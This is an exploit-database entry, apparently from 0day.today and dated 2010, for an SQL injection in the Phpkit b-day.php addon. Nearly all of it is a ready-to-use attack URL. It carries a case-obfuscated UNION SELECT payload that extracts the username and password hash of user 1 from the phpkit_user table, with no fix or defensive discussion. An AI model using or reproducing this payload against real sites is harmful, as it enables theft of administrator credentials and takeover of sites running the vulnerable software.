id: 9682
date: 03/22/2010
title: Phpkit addon (b-day.php) SQL Injection Vulnerability
author: n3w7u
cves: 

====================================================
Phpkit addon (b-day.php) SQL Injection Vulnerability
====================================================

[+] Autor: n3w7u

[+] Vulnerabilities [ SQL Injection ]

[+] Language: [ PHP ]

[+] Date: 22.03.2010


.-=--=--=--=--=--=--=--=--=--=--=-.

[+] Vulnerability

include.php?path=b-day.php&ausgabe=


[+] Exploitable


http://[host]/[path]/include.php?path=b-day.php&ausgabe=11+uNIoN+sElECt
+1,concat(user_name,0x3a,user_pw),3,4,5,6+from+phpkit_user+where+user_id=1-
-



#  0day.today [2023-03-21]  #